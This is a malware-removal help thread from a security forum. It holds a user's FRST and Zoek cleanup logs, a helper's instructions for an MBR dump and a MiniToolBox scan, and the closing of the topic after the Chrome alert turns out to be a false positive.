CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
*****************

catchme => service removed successfully
MSICDSetup => service removed successfully
VGPU => service removed successfully
C:\Windows\Tasks\AutoKMS.job => moved successfully.
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => key removed successfully
C:\Windows\AutoKMS => moved successfully.
C:\Windows\Tasks\AutoKMS.job not found.

==== End of Fixlog 11:19:13 ====

Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by Gianluca on 13/08/2015 at 11:21:45,63.
Microsoft Windows 7 Ultimate 6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: D:\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

13/08/2015 11:23:08 Zoek.exe System Restore Point Created Successfully.

==== Empty Folders Check ======================

C:\PROGRA~2\Sega deleted successfully
C:\PROGRA~2\COMMON~1\SWF Studio deleted successfully
C:\Program Files\ATI Technologies deleted successfully
C:\Program Files\Easeware deleted successfully
C:\PROGRA~3\Origin deleted successfully
C:\Users\Gianluca\AppData\Roaming\Media Player Classic deleted successfully
C:\Users\Gianluca\AppData\Local\Samsung deleted successfully
C:\Users\Gianluca\AppData\Local\VirtualStore deleted successfully

==== Deleting CLSID Registry Keys ======================


==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== Deleting Files \ Folders ======================

C:\PROGRA~2\Sega not found
C:\PROGRA~2\SystemRequirementsLab deleted
C:\PROGRA~2\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Mipony deleted
C:\PROGRA~3\Package Cache deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\jetpack deleted
C:\Users\Gianluca\Desktop\MiPony.lnk deleted
C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\extensions\abs@avira.com deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz\ybpi.die" deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz\ybpi.die.0" deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz" deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
user_pref("browser.startup.homepage", "http://www.google.it/");

==== Firefox Extensions ======================

ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
- Firebug - %ProfilePath%\extensions\firebug@software.joehewitt.com.xpi
- Video DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi
- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
- QuickJava - %ProfilePath%\extensions\{E6C1199F-E687-42da-8C24-E7770CC3AE66}.xpi

ProfilePath: C:\Users\Gianluca\AppData\Roaming\TomTom\HOME\Profiles\fl8mml8x.default
- Undetermined - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com
- Undetermined - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\baseTheme@tomtom.com

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
FD82108FD60B63010325D9AF6F00AF99 - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll - Shockwave Flash
1F352B5944AF5C2204D9EFF7F845C5AF - C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll - Google Update
3CD19649B2C3023D65E67C056457A2BC - C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll - Facebook Video Calling Plugin


==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
flliilndjeohchalpbbcdekjklbdgfkk - No path found[]

AdBlock - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom
Bookmark Manager - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
AdBlock - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg

==== Chromium Startpages ======================

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Preferences
"homepage": "https://www.google.it/",
"startup_urls": [ "https://www.google.it/" ]

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences
},"http://www.vvvvid.it:80,http://www.vvvvid.it:80":{"setting":1},"https://[*.]www.youtube.com:443,*":{"setting":1},"https://player.vimeo.com:443,https://www.facebook.com:443":{"setting":1},"https://www.facebook.com:443,https://www.facebook.com:443":{"setting":1}},"geolocation":{"https://locator.unicredit.it:443,https://locator.unicredit.it:443":{"setting":2}},"images":{},"javascript":{},"media_stream":{},"media_stream_camera":{},"media_stream_mic":{},"metro_switch_to_desktop":{},"midi_sysex":{},"mixed_script":{},"mouselock":{},"notifications":{},"plugins":{},"popups":{},"ppapi_broker":{},"protocol_handlers":{},"push_messaging":{},"ssl_cert_decisions":{}},"pattern_pairs":{"http://www.altadefinizione01.com:80,http://www.altadefinizione01.com:80":{"fullscreen":1},"http://www.hdpass.link:80,http://altadefinizione.click:80":{"fullscreen":1},"http://www.vvvvid.it:80,http://www.vvvvid.it:80":{"fullscreen":1},"https://[*.]www.youtube.com:443,*":{"fullscreen":1},"https://player.vimeo.com:443,https://www.facebook.com:443":{"fullscreen":1},"https://www.facebook.com:443,https://www.facebook.com:443":{"fullscreen":1}},"pref_version":1},"created_by_version":"42.0.2311.135","exit_type":"Normal","exited_cleanly":true,"gaia_info_picture_url":"https://lh4.googleusercontent.com/-p4L0SliQl0o/AAAAAAAAAAI/AAAAAAAAACw/mYcIbIbcATk/s256-c/photo.jpg","gaia_info_update_time":"13083890127732776","icon_version":3,"managed_user_id":"","managed_users":{},"migrated_content_settings_exceptions":true,"migrated_default_content_settings":true,"migrated_default_media_stream_content_settings":true,"name":"Primo utente","per_host_zoom_levels":{}},"protection":{"macs":{}},"reverse_autologin":{"enabled":false},"savefile":{"default_directory":"D:\\Desktop"},"selectfile":{"last_directory":"D:\\Desktop"},"session":{"restore_on_startup_migrated":true,"startup_urls_migration_time":"13075464209545299"},"shelf_chrome_icon_index":1,"signin":{"signedin_time":"13075464368221488"},"sync":{"app_list":true,"app_settings":true,"apps":true,"autofill":true,"autofill_wallet":true,"bookmarks":true,"dictionary":true,"encryption_bootstrap_token":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAsDJUJFfmDEGhhp3hEMBBzwAAAAACAAAAAAAQZgAAAAEAACAAAACpk18AZrxuJMcUEnvDZ17fmyaNT2PApnpEHQOjYRx3oQAAAAAOgAAAAAIAACAAAADLurwIlsJz/lcaRE3upgBgKbWefAYCIb3c9NCN3N76DkAAAAAZoMrVpWc0Jo5Fs1OteuGeyqcQQPbnSOLjC99+WmYm2p55TwTHzrxF8CfFUqZYFlfTNJJQ4niy3PmPCKSpHQkTQAAAAOi59yY2nwwC+AmTfkN+aFOqYg5xWLiYlGb5ktLExiZLm/2yOplORqftn6Hi16gkDgUO7huJzgRRW4BMNq2AnzQ=","extension_settings":true,"extensions":true,"favicon_images":true,"favicon_tracking":true,"first_sync_time":"13075464368233120","has_setup_completed":true,"history_delete_directives":true,"keystore_encryption_bootstrap_token":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAsDJUJFfmDEGhhp3hEMBBzwAAAAACAAAAAAAQZgAAAAEAACAAAAD5dvQZyZElhpA9x/mupCBk5uIy7luGan2EceqUfL/QnQAAAAAOgAAAAAIAACAAAABFtnF2pRk8doAkL46L599ZbUh/tqPpHoMioR07L1HBNFAAAAAuejhPY+Sv/7QUYHG8iAo1lVxdKST4A9dTUomtuzYs8fmak4owOihird7jRS+lX6qQp+nBGfKZ5D1Ymv16HAsVVuE0scrbtd4pP7mA4/Jc3UAAAAC3ZUU7srjmrVVBNUlw9tyvtXr5+PHqhcPFU2B/la0kApQYqsXO1DJRzJV5+6ETP0rjDxVIZWNm9YSBHaBQIx1V","last_synced_time":"13083931231902819","managed_user_settings":true,"managed_user_shared_settings":true,"managed_user_whitelists":true,"managed_users":true,"memory_warning_count":0,"passwords":true,"preferences":true,"priority_preferences":true,"search_engines":true,"session_sync_guid":"session_synclqTQsidpB2pCdhj4dDTvJg==","sessions":true,"shutdown_cleanly":true,"suppress_start":false,"tabs":true,"themes":true,"typed_urls":true},"sync_promo":{"startup_count":2},"translate_accepted_count":{"cs":0,"en":0,"es":0,"fr":0,"it":0,"und":0},"translate_blocked_languages":["it"],"translate_denied_count":{"en":0,"es":13,"it":1,"und":1},"translate_denied_count_for_language":{"cs":1,"en":2,"fr":1},"translate_last_denied_time":1430996301614.406,"translate_last_denied_time_for_language":{"cs":1439400036626.1,"en":1439115108072.135,"fr":1439119182508.963},"translate_too_often_denied":true,"translate_too_often_denied_for_language":{"en":true},"translate_whitelists":{},"zerosuggest":{"cachedresults":""}}
mieda":"F6C3643F5662214591A4902952CA6A7FF8CA9B727E37619C88C528503CA661CF","pafkbggdmjlpgkdkcbjmhmfcdpncadgh":"B9E84D725DF0031C5392203EA9563002612BCAF0F7BCF57190B5914B2492BD06","pjkljhegncpnkpknbcohdijeoejaedia":"9BF7BD30FEA2833C7D2288B7C7DFB6B3288FF63B1D810AB69FDF9DFA80A2683C"}},"google":{"services":{"account_id":"719032B1BE59CE0CAC06D2E76784CFE5873DC978078F7603A5C683668AA80981","last_username":"A6EC537858565BA3AA4E8764B710F5261953BF0652311FCED43FC6ACDA1BFCD1","username":"BD42B9F1F9EE61654A3F9583D5300C93C0FBC3041F9E05F2CC2D080298255F0E"}},"homepage":"CC692BC2683A241E4560C1455E2F5D1868AE9893F6CDA34CB9167F0B2691F8AE","homepage_is_newtabpage":"EE7C1583B3E2909D27B4C8501AC687BF73EE938C1A92A37E96CBE7F96AA8CD96","pinned_tabs":"DE73121B89C6F11E20AAF8FEED6A96B94D1C047D6EDB0DB7A120A8D397C92E94","prefs":{"preference_reset_time":"955108F5349848B0143F88A306131CD674C2E9A0D34C4797DA1227D90CC1E272"},"profile":{"reset_prompt_memento":"4A8C588892C444E32CEFDBDBA7E63E4E3DC7A1F9EDAE4E40C7742D10A5D55920"},"safebrowsing":{"incidents_sent":"AC17861092B04C0A791A45503558E5F29DC952F2674E60A4D02E03A00800D8E2"},"search_provider_overrides":"536ECCA8FF81DD98BEDD8237286CE450386F72DEAD3BAD06401603F15CEFA2CB","session":{"restore_on_startup":"7B2FB04F6713ECAB04E326F0B020F7004B17FF998EB3270107F502C6D9671190","startup_urls":"A2664177D4A307B5E496EE46FE5B8E969469E277261021A7C8140FE7EF5E4F37"},"software_reporter":{"prompt_reason":"920F8344B512394E2F2278F2B4D84F26B7DE5AF5D97F4D8D63708A31F6A1C9F1","prompt_seed":"4DDF784F4FA10EE4880ABC9234B9F82E5C7D13222E276D9C54E107F2A40C78D9","prompt_version":"9961D3E48E02EBCCEFC0C2F49350BEFA062A31FD437F4152B53820F437EF8410"},"sync":{"remaining_rollback_tries":"913E8B943F833AEB3DB62E0BC3919FBDEBFF0F14DC5F306E25887D8950D1B811"}},"super_mac":"47C3D67905800C2F4136EC98F37F6DFD40B0DC86567EE83F8CD7838F671629BA"},"session":{"restore_on_startup":4,"startup_urls":["https://www.google.it/?gfe_rd=cr&ei=IQX3U9PyLqmo8wfJqICICg"]},"sync":{"remaining_rollback_tries":0}}


==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.it/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.it/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MiPony deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeCS5ServiceManager deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Avira Systray deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KiesPreload deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KiesTrayAgent deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RGSC deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SwitchBoard deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TomTomHOME.exe deleted successfully

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5 emptied successfully
C:\Users\Gianluca\AppData\Local\Temp\acro_rd_dir\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9 will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL will be deleted at reboot
C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

==== Empty FireFox Cache ======================

C:\Users\Gianluca\AppData\Local\Mozilla\Firefox\Profiles\bv56la9c.default\cache2 emptied successfully

==== Empty Chrome Cache ======================

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Cache emptied successfully
C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=220 folders=65 40912549 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\temp emptied successfully
C:\Users\Default User\AppData\Local\temp emptied successfully
C:\Users\Gianluca\AppData\Local\Temp will be emptied at reboot
C:\Users\Public\AppData\Local\temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\Gianluca\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S" not deleted
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL" not found

==== EOF on 13/08/2015 at 11:32:38,39 ======================

Attached Files


Edited by Oh My!, 13 August 2015 - 09:03 AM.


#6 GiakMind

GiakMind
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 13 August 2015 - 08:29 AM

Sorry for double post, I'll be in vacation for 6 days, but I still want your help when I'm back! Ciao :)



#7 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,392 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:04:43 PM

Posted 13 August 2015 - 09:17 AM

No problem on the delay, thank you for letting me know. Enjoy yourself! :)

Can you tell me if you experience this with just Chrome or is it the same with any other browser?

When you return please do these things for me.

===================================================

MBR Dump Using Farbar's Recvovery Scan Tool in the Recovery Environment

--------------------

For this step you will need a USB flash drive.
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it on the flashdrive as fixlist.txt
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S
SaveMbr: Drive=0
  • Please download Farbar Recovery Scan Tool and save it to a flash drive. You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Plug the flashdrive into the infected PC and follow the 2 step process below to enter the System Recovery Options using one of the three options listed, then running Farbar's Recover Scan Tool
----------

Entering into the System Recovery Options

Option #1

To enter System Recovery Options in Windows 8:Option #2

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.
Option #3

To enter System Recovery Options by using Windows installation disc:
  • Insert the installation disc.
  • Restart your computer.
  • If prompted, press any key to start Windows from the installation disc. If your computer is not configured to start from a CD or DVD, check your BIOS settings.
  • Click Repair your computer.
  • Select English as the keyboard language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next
----------

Running Farbar's Recovery Scan Tool in System Recovery
  • Once you are in the System Recovery Options menu you will get the following options:

Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt

  • Select Command Prompt
  • In the command window type in Notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select Computer and find your flash drive letter and close the notepad.
  • In the command window type e:\frst (for x64 bit version type e:\frst64) and press Enter
    • Note: Replace letter e with the drive letter of your flash drive.
  • When the tool opens click Yes to disclaimer.
  • Press Fix button.
  • It will make a log (mbrdump.txt) on the flash drive. Please attach it to your reply. If you open the file you will not be able to read it.
===================================================

Farbar's MiniToolBox

--------------------
  • Please download MiniToolBox, save it to your desktop
  • Please close any Firefox browsers you may have open
  • Double click the icon to launch the program
  • Make sure only the following options are checked:

Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries

  • Click Go and once the scan is completed a Result.txt Notepad document will open on your desktop
  • Please copy and paste the contents in your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • Fixlog
  • Attached mbrdump.txt file
  • MiniToolBox log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#8 GiakMind

GiakMind
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 18 August 2015 - 05:05 PM

I'm back. This happened on Google Chrome only. Yesterday I checked news about this virus and it sorted out it was a false positive. In fact, now it's fixed (no more alarms displayed) so I don't need to continue our procedure anymore!

Thank you :)



#9 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,392 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:04:43 PM

Posted 18 August 2015 - 05:45 PM

Thanks for letting me know. Yes, I have seen a few of these false positives in the last week. Please allow me to leave you with this.

===================================================

Keeping Your Computer Safe

----------

Lawrence Abrams, the founder of BleepingComputer.com, has developed an excellent tutorial which will provide you with the information you need to know to keep your computer secure and clean. Please take the time to read:In addition, here are some more links you might find of interest:Thank you for placing your trust in BleepingComputer. It was a pleasure serving you. OhMy_done.gif
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#10 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,392 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:04:43 PM

Posted 19 August 2015 - 09:25 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users